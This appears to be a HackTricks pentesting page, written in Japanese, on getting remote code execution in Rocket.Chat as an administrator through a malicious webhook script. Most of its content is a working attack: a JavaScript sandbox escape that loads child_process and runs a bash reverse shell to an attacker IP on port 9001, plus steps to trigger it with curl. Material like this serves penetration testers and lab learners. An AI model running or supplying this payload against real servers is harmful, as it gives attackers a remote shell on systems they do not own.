hacktricks/src/network-services-pentesting/pentesting-web/rocket-chat.md

Rocket Chat

{{#include ../../banners/hacktricks-training.md}}

RCE

Rocket Chatの管理者であれば、RCEを取得できます。

• **Integrationsに移動し、New Integrationを選択して、Incoming WebHookまたはOutgoing WebHook**のいずれかを選択します。
• /admin/integrations/incoming

• docsによると、両方ともES2015 / ECMAScript 6（基本的にJavaScript）を使用してデータを処理します。では、rev shell for javascriptを取得しましょう。

const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• WebHookを設定します（チャンネルと投稿のユーザー名が存在する必要があります）：

• WebHookスクリプトを設定します：

• 変更を保存します
• 生成されたWebHook URLを取得します：

• curlで呼び出すと、rev shellを受け取るはずです

{{#include ../../banners/hacktricks-training.md}}